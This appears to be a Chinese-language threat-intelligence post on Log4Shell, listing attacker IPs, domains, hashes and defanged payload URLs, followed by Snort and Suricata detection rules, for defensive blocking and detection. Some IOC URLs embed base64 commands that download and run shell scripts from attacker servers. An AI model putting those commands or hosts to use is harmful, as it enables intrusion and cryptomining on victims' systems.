目录导航
关于Log4Shell(CVE-2021-44228)自行参考往期文章:
攻击源ip地址
源IP使用Apache Log4j RCE尝试攻击,其中包含很大部分Tor节点
1.116.59.211
1.14.17.89
103.103.0.141
103.103.0.142
103.214.5.13
104.244.72.115
104.244.72.129
104.244.72.136
104.244.72.7
104.244.73.126
104.244.73.43
104.244.73.85
104.244.73.93
104.244.74.211
104.244.74.55
104.244.74.57
104.244.75.225
104.244.75.74
104.244.76.13
104.244.76.170
104.244.76.173
104.244.76.44
104.244.77.139
104.244.77.235
104.244.78.213
104.244.79.6
107.189.1.160
107.189.1.178
107.189.10.137
107.189.10.143
107.189.11.153
107.189.12.135
107.189.13.143
107.189.14.182
107.189.14.76
107.189.14.98
107.189.28.100
107.189.28.241
107.189.29.107
107.189.29.41
107.189.3.244
107.189.31.195
107.189.31.241
107.189.8.65
109.237.96.124
109.70.100.22
109.70.100.23
109.70.100.25
109.70.100.26
109.70.100.27
109.70.100.31
109.70.100.34
109.70.100.36
116.24.67.213
121.4.56.143
121.5.219.20
122.161.50.23
128.31.0.13
133.18.201.195
134.122.34.28
135.148.43.32
137.184.102.82
137.184.104.73
137.184.106.119
137.184.28.58
137.184.99.8
138.68.167.19
139.59.8.39
139.59.97.205
140.246.171.141
142.93.151.166
142.93.34.250
143.110.221.204
143.198.32.72
143.198.45.117
145.220.24.19
146.56.131.161
147.182.131.229
147.182.150.124
147.182.154.100
147.182.167.165
147.182.169.254
147.182.198.103
147.182.215.36
147.182.219.9
150.158.189.96
151.115.60.113
151.80.148.159
152.89.239.12
154.39.255.195
154.94.7.88
157.230.32.67
157.245.109.75
159.203.8.145
159.223.9.17
159.65.155.208
159.65.194.103
159.65.3.102
159.65.58.66
161.35.119.60
162.142.125.193
162.142.125.194
162.142.125.195
162.142.125.196
162.142.125.42
162.142.125.43
162.142.125.44
162.142.125.58
162.142.125.59
162.142.125.60
162.247.74.201
162.247.74.202
162.247.74.206
162.247.74.27
162.247.74.7
162.255.202.246
163.172.157.143
163.172.213.212
164.90.199.216
166.70.207.2
167.248.133.113
167.248.133.114
167.248.133.115
167.248.133.116
167.248.133.41
167.248.133.42
167.248.133.43
167.248.133.44
167.248.133.57
167.248.133.58
167.248.133.59
167.248.133.60
167.71.13.196
167.94.138.113
167.94.138.114
167.94.138.115
167.94.138.116
167.94.138.41
167.94.138.42
167.94.138.43
167.94.138.44
167.94.138.57
167.94.138.58
167.94.138.59
167.94.138.60
167.94.145.60
167.99.164.201
167.99.172.213
167.99.172.58
170.210.45.163
171.25.193.20
171.25.193.25
171.25.193.77
171.25.193.78
172.106.17.218
175.6.210.66
176.10.104.240
176.10.99.200
178.17.170.135
178.17.170.23
178.17.171.102
178.17.174.14
178.176.202.121
178.176.203.190
178.20.55.16
178.62.79.49
179.43.187.138
18.27.197.252
180.149.231.245
181.214.39.2
185.10.68.168
185.100.86.128
185.100.87.139
185.100.87.174
185.100.87.202
185.100.87.41
185.107.47.171
185.107.47.215
185.107.70.56
185.129.61.1
185.129.61.4
185.130.44.108
185.14.97.147
185.165.169.18
185.220.100.240
185.220.100.241
185.220.100.242
185.220.100.243
185.220.100.244
185.220.100.245
185.220.100.246
185.220.100.247
185.220.100.248
185.220.100.249
185.220.100.250
185.220.100.251
185.220.100.252
185.220.100.253
185.220.100.254
185.220.100.255
185.220.101.1
185.220.101.10
185.220.101.128
185.220.101.129
185.220.101.131
185.220.101.132
185.220.101.133
185.220.101.134
185.220.101.135
185.220.101.136
185.220.101.137
185.220.101.138
185.220.101.139
185.220.101.14
185.220.101.140
185.220.101.141
185.220.101.142
185.220.101.143
185.220.101.144
185.220.101.145
185.220.101.146
185.220.101.147
185.220.101.148
185.220.101.149
185.220.101.150
185.220.101.151
185.220.101.152
185.220.101.153
185.220.101.154
185.220.101.155
185.220.101.156
185.220.101.157
185.220.101.158
185.220.101.159
185.220.101.16
185.220.101.160
185.220.101.161
185.220.101.162
185.220.101.163
185.220.101.164
185.220.101.165
185.220.101.166
185.220.101.167
185.220.101.168
185.220.101.169
185.220.101.170
185.220.101.171
185.220.101.172
185.220.101.173
185.220.101.174
185.220.101.175
185.220.101.176
185.220.101.177
185.220.101.178
185.220.101.179
185.220.101.180
185.220.101.181
185.220.101.182
185.220.101.183
185.220.101.184
185.220.101.185
185.220.101.186
185.220.101.187
185.220.101.188
185.220.101.189
185.220.101.19
185.220.101.190
185.220.101.191
185.220.101.2
185.220.101.21
185.220.101.3
185.220.101.32
185.220.101.33
185.220.101.34
185.220.101.35
185.220.101.36
185.220.101.37
185.220.101.38
185.220.101.39
185.220.101.40
185.220.101.41
185.220.101.42
185.220.101.43
185.220.101.44
185.220.101.45
185.220.101.46
185.220.101.47
185.220.101.48
185.220.101.49
185.220.101.50
185.220.101.51
185.220.101.52
185.220.101.53
185.220.101.54
185.220.101.55
185.220.101.56
185.220.101.57
185.220.101.58
185.220.101.59
185.220.101.60
185.220.101.61
185.220.101.62
185.220.101.63
185.220.101.7
185.220.101.9
185.220.102.241
185.220.102.242
185.220.102.243
185.220.102.245
185.220.102.246
185.220.102.249
185.220.102.250
185.220.102.252
185.220.102.253
185.220.102.254
185.220.102.4
185.220.102.6
185.220.102.7
185.220.102.8
185.220.103.117
185.220.103.119
185.220.103.4
185.220.103.5
185.220.103.7
185.220.103.8
185.232.23.46
185.236.200.117
185.38.175.130
185.38.175.131
185.38.175.132
185.4.132.183
185.56.80.65
185.83.214.69
188.120.246.215
188.166.122.43
188.166.223.38
188.166.225.104
188.166.48.55
188.166.74.97
188.166.92.228
191.232.38.25
192.160.102.169
192.42.116.19
192.81.130.207
192.99.152.200
193.110.95.34
193.189.100.195
193.189.100.196
193.189.100.201
193.189.100.202
193.189.100.203
193.218.118.183
193.218.118.231
193.239.232.101
193.239.232.102
193.31.24.154
194.135.33.152
194.163.133.36
194.163.45.31
194.48.199.78
195.123.247.209
195.176.3.19
195.176.3.24
195.19.192.26
195.206.105.217
195.251.41.139
195.254.135.76
197.246.171.83
198.144.121.43
198.96.155.3
198.98.51.189
198.98.57.191
198.98.57.207
198.98.60.19
199.195.250.77
199.195.253.162
199.217.117.92
199.249.230.110
199.249.230.158
20.205.104.227
20.71.156.146
204.8.156.142
205.185.115.217
205.185.115.45
205.185.117.149
205.185.126.167
205.185.127.35
206.189.20.141
209.127.17.234
209.127.17.242
209.141.34.232
209.141.36.206
209.141.41.103
209.141.45.189
209.141.45.227
209.141.49.232
211.154.194.21
212.109.197.1
212.192.216.30
212.192.246.95
212.193.57.225
212.47.237.67
213.202.216.189
213.61.215.54
213.95.149.22
216.218.134.12
221.199.187.100
23.120.182.121
23.129.64.131
23.129.64.132
23.129.64.133
23.129.64.135
23.129.64.137
23.129.64.139
23.129.64.140
23.129.64.141
23.129.64.145
23.129.64.146
23.129.64.148
23.129.64.149
23.154.177.2
23.154.177.4
23.154.177.7
23.160.193.176
23.183.83.71
23.184.48.209
3.94.114.30
31.42.184.34
31.42.186.101
35.76.31.198
37.120.232.51
37.123.163.58
37.19.212.104
37.228.129.109
45.12.134.108
45.129.56.200
45.13.104.179
45.130.229.168
45.137.184.31
45.137.21.9
45.15.16.70
45.153.160.130
45.153.160.131
45.153.160.133
45.153.160.134
45.153.160.135
45.153.160.136
45.153.160.138
45.153.160.140
45.153.160.2
45.154.255.147
45.155.205.233
45.61.185.54
45.61.186.225
46.105.95.220
46.166.139.111
46.173.218.146
46.182.21.248
46.4.51.212
47.254.127.78
5.157.38.50
5.182.210.216
5.183.209.217
5.199.143.202
5.2.70.140
5.2.72.73
51.15.180.36
51.15.43.205
51.15.59.15
51.15.76.60
51.255.106.85
51.75.161.78
51.77.52.216
54.173.99.121
60.31.180.149
61.19.25.207
62.102.148.68
62.102.148.69
62.210.130.250
62.76.41.46
64.113.32.29
66.220.242.222
68.183.198.247
68.183.44.143
68.79.17.59
72.223.168.73
79.146.170.248
80.71.158.44
81.17.18.59
81.17.18.60
81.17.18.61
81.17.18.62
82.221.131.71
85.93.218.204
87.118.110.27
88.80.20.86
89.163.154.91
89.163.252.230
89.163.252.30
89.249.63.3
89.35.30.236
91.203.5.146
91.219.237.21
92.223.89.187
92.242.40.21
94.142.241.194
94.230.208.147
95.214.54.97
128.199.15.215
128.199.222.221
134.209.24.42
134.209.82.14
137.184.98.176
138.197.106.234
138.197.108.154
138.197.167.229
138.197.193.220
138.197.216.230
138.197.72.76
138.197.9.239
138.68.155.222
138.68.250.214
139.59.101.242
139.59.103.254
139.59.108.31
139.59.163.74
139.59.182.104
139.59.188.119
142.93.157.150
143.110.221.219
143.198.180.150
143.198.183.66
147.182.179.141
147.182.187.229
147.182.216.21
157.245.129.50
159.203.187.141
159.203.45.181
159.203.58.73
159.223.42.182
159.223.61.102
159.89.115.238
159.89.122.19
159.89.133.216
159.89.146.147
159.89.150.150
159.89.154.102
159.89.154.185
159.89.154.64
159.89.154.77
159.89.48.173
159.89.94.219
161.35.155.230
161.35.156.13
164.92.254.33
165.22.201.45
165.227.32.109
165.227.37.189
165.232.80.166
165.232.80.22
165.232.84.226
165.232.84.228
167.172.94.250
167.99.172.99
167.99.186.227
167.99.204.151
167.99.221.217
167.99.221.249
167.99.36.245
167.99.88.151
174.138.6.128
178.128.226.212
178.128.232.114
178.62.23.146
178.62.32.211
188.166.102.47
188.166.105.150
188.166.45.93
188.166.76.204
188.166.86.206
46.101.223.115
51.195.45.190
64.227.67.110
67.205.170.85
68.183.192.239
68.183.198.36
68.183.207.73
68.183.33.144
68.183.35.171
68.183.36.244
68.183.41.150恶意攻击者服务器/域名地址及hash值
ioc_category ioc
DOMAIN bvprzqhoz7j2ltin.onion.ly
DOMAIN bvprzqhoz7j2ltin.onion.ws
DOMAIN bvprzqhoz7j2ltin.tor2web.su
DOMAIN log.exposedbotnets.ru
DOMAIN nazi.uy
HASH 0bb39ba78fc976edb9c26de1cecd60eb
HASH 1348a00488a5b3097681b6463321d84c
HASH 1fe52c0b0139660b2335dd7b7c12ea05
HASH 23b317600f4d82ea58c6b39b6eb5a67c
HASH 2615ebcd4c82d8822ce0b58725938cc6
HASH 40e3b969906c1a3315e821a8461216bb
HASH 6d275af23910c5a31b2d9684bbb9c6f3
HASH 7b72cf30ac42c20f0a14b0b87425c00a
HASH 81fbe69a36650504b88756074a36c183
HASH 95d9a068529dd2ea4bb4bef644f5c4f5
HASH cf2ce888781958e929be430de173a0f8
HASH d20478a01344026a0ecd60b0b29e9bc1
HASH f14019c55e7ce19d93838a4b2f6aec12
HASH 0579a8907f34236b754b07331685d79e
HASH 07b7746b922cf7d7fa821123a226ed36
HASH dbc9125192bd1994cbb764f577ba5dda
HASH 648effa354b3cbaad87b45f48d59c616
HASH ccef46c7edf9131ccffc47bd69eb743b
IP_PORT 110.42.239.3:80
IP_PORT 114.132.231.19:80
IP_PORT 121.41.109.54:2204
IP_PORT 159.89.182.117:80
IP_PORT 18.228.7.109:80
IP_PORT 210.141.105.67:80
IP_PORT 45.130.229.168:9999
SLD *.exposedbotnets.ru
SLD *.nmsl.run
SLD *.viperdns.xyz
SLD *.wdnmdnmsl.xyz
URL http[:]//110.42.239.3/2.hta
URL http[:]//114.132.231.19/0.hta
URL http[:]//114.132.231.19/OK1.hta
URL http[:]//114.132.231.19/hfs.exe
URL http[:]//114.132.231.19/2.hta
URL http[:]//138.197.206.223/.x/xmra64
URL http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL http[:]//18.228.7.109/.log/pty3;
URL http[:]//18.228.7.109/.log/pty2;
URL http[:]//18.228.7.109/.log/log
URL http[:]//18.228.7.109/.log/pty4;
URL http[:]//18.228.7.109/.log/pty5;
URL http[:]//18.228.7.109/.log/pty1;
URL http[:]//18.228.7.109/.log/pty2
URL http[:]//18.228.7.109/.log/pty5
URL http[:]//18.228.7.109/.log/pty3
URL http[:]//18.228.7.109/.log/
URL http[:]//18.228.7.109/.log/pty1
URL http[:]//18.228.7.109/.log/pty4
URL http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL http[:]//34.221.40.237/.x/
URL http[:]//45.130.229.168:9999/Exploit.class
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/lh.sh
URL http[:]//62.210.130.250/web/admin/x86_g
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//62.210.130.250/web/admin/
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//62.210.130.250/web/admin/x86_g
URL 185.154.53.140:80
URL http[:]//185.154.53.140/mg
URL http[:]//185.154.53.140/o
URL http[:]//185.154.53.140/s
URL http[:]//185.154.53.140/get
URL http[:]//185.154.53.140/ms
URL http[:]//138.197.206.223/.x/xmra64
URL http[:]//138.197.206.223/.x/xmra32
URL http[:]//18.228.7.109/.log/pty1
URL http[:]//18.228.7.109/.log/pty4
URL http[:]//210.141.105.67/wp-content/themes/twentythirteen/m8
URL http[:]//18.228.7.109/.log/pty2
URL http[:]//18.228.7.109/.log/pty3
URL http[:]//18.228.7.109/.log/pty5
URL http[:]//159.89.182.117/wp-content/themes/twentyseventeen/ldm
URL http[:]//18.228.7.109/.log/log
URL http[:]//82.118.18.201/cron.sh
URL http[:]//92.242.40.21/lh2.sh
URL http[:]//185.191.32.198/lh.sh
URL http[:]//82.118.18.201/curl-amd64
URL http[:]//82.118.18.201/libsystem.so
URL http[:]//82.118.18.201/kinsing
URL http[:]//82.118.18.201/lh.sh
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//62.210.130.250/lh.sh
URL http[:]//80.71.158.12/libsystem.so
URL http[:]//80.71.158.12/curl-amd64
URL http[:]//80.71.158.12/lh.sh
URL http[:]//185.191.32.198/unk.sh
URL http[:]//45.137.155.55/cron.sh
URL http[:]//185.191.32.198/ex.sh
URL http[:]//45.137.155.55/ex.sh
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/web/admin/x86_g
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//80.71.158.12/kinsing
URL http[:]//80.71.158.12/curl-amd64
URL http[:]//92.242.40.21/kinsing
URL http[:]//92.242.40.21/curl-amd64
URL http[:]//45.137.155.55/kinsing
URL http[:]//195.19.192.28/kinsing
URL http[:]//185.191.32.198/lh.sh
URL http[:]//80.71.158.44/lh.sh
URL http[:]//62.210.130.250/lh.sh
URL http[:]//92.242.40.21/lh.sh
URL http[:]//92.242.40.21/lh2.sh
HASH 07b7746b922cf7d7fa821123a226ed36
HASH 0e1a1382d4fd420f8a5ae1d88b3085e7
HASH 40e3b969906c1a3315e821a8461216bb
HASH 648effa354b3cbaad87b45f48d59c616
URL http[:]//45.130.229.168:1389/Exploit
IP_PORT 45.130.229.168:1389
IP_PORT 78.31.71.248:1389
URL http[:]//78.31.71.248:1389/lewrgz
URL http[:]//134.209.163.248/callback/
IP_PORT 45.155.205.233:5874
URL http[:]//45.155.205.233:5874/87.138.139.76:443
IP_PORT 45.155.205.233:12344
URL http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC84Ny4xMzguMTM5Ljc2OjQ0Myl8YmFzaA==
URL http[:]//015ed9119662.bingsearchlib.com:39356/a
URL http[:]//32fce0c1f193.bingsearchlib.com:39356/a
URL http[:]//3be6466b6a20.bingsearchlib.com:39356/a
URL http[:]//6c8d7dd40593.bingsearchlib.com:39356/a
URL http[:]//7faf976567f5.bingsearchlib.com:39356/a
URL http[:]//e86eafcf9294.bingsearchlib.com:39356/a
SLD *.bingsearchlib.com
IP_PORT 80.71.158.12:5557
IP_PORT 45.155.205.233:12344
URL http[:]//80.71.158.12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4LjEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=
URL http[:]//45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK
URL http[:]//80.71.158.12/lh.sh
IP_PORT 80.71.158.12:80
IP_PORT 45.155.205.233:5874
URL http[:]//62.210.130.250/web/admin/x86
URL http[:]//62.210.130.250/web/admin/x86_g
URL http[:]//62.210.130.250/web/admin/x86_64
URL http[:]//80.71.158.12/kinsing
URL http[:]//80.71.158.12/libsystem.so
URL http[:]//80.71.158.12/kinsing
URL http[:]//45.137.155.55/ex.sh
URL http[:]//45.137.155.55/kinsing
URL http[:]//80.71.158.12/libsystem.so
URL http[:]//80.71.158.12/kinsing
URL http[:]//80.71.158.12/Exploit69ogQNSQYz.class
HASH 3dfbe75871e218d08328a01c56e1bb42
HASH 648effa354b3cbaad87b45f48d59c616
HASH ccef46c7edf9131ccffc47bd69eb743b
HASH cf2ce888781958e929be430de173a0f8
HASH 40e3b969906c1a3315e821a8461216bb
HASH 6d275af23910c5a31b2d9684bbb9c6f3
HASH 1348a00488a5b3097681b6463321d84c
HASH d9f82dbf8733f15f97fb352467c9ab21
HASH ff171712ab8816f3d7600fe75bb18052
IP_PORT 45.83.193.150:1389
IP_PORT 31.220.58.29:80
URL http[:]//45.83.193.150:1389/Exploit
URL http[:]//31.220.58.29/Exploit.class
URL http[:]//172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd
IP_PORT 172.105.241.146:80
URL http[:]//18.228.7.109/.log/log
IP_PORT 18.228.7.109:80
HASH 1718956642fbd382e9cde0c6034f0e21
HASH c717c47941c150f867ce6a62ed0d2d35
HASH ceb9a55eaa71101f86b14c6b296066c9
HASH f6e51ea341570c6e9e4c97aee082822bSnort检测规则
不了解snort的参考以下文章
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)”; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)”; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper TCP Bypass (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper UDP Bypass (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)”; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; content:” |
| alert udp $HOME_NET any -> any 53 (msg:”ET POLICY dnslog .cn Observed in DNS Query”; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; content:” |
| alert udp $HOME_NET any -> any 53 (msg:”ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain”; content:” |
Suricata检测规则
Suricata是一个基于开源的入侵检测系统(IDS) 和入侵防御系统(IPS)。它由开放信息安全基金会 (OISF) 开发。测试版于 2009 年 12 月发布,第一个标准版本于 2010 年 7 月发布
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper TCP Bypass (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http dns) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldap) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http ldaps) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (http rmi) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp dns) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp iiop) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldap) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (tcp rmi) (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert tcp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; flow:established,to_server; content:” |
| alert udp $HOME_NET any -> any 53 (msg:”ET ATTACK_RESPONSE DNS Query for Observed CVE-2121-44228 Payload Domain”; content:” |
| alert udp $HOME_NET any -> any 53 (msg:”ET POLICY dnslog .cn Observed in DNS Query”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt – lower/upper UDP Bypass (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp dns) (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp iiop) (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldap) (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp ldaps) (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET EXPLOIT Apache log4j RCE Attempt (udp rmi) (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol lower Bypass (CVE-2021-44228)”; content:” |
| alert udp any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:”ET INFO Possible Apache log4j RCE Attempt – Any Protocol upper Bypass (CVE-2021-44228)”; content:” |
附一个Log4Shell 漏洞测试器
https://log4shell.huntress.com/
项目地址
转载请注明出处及链接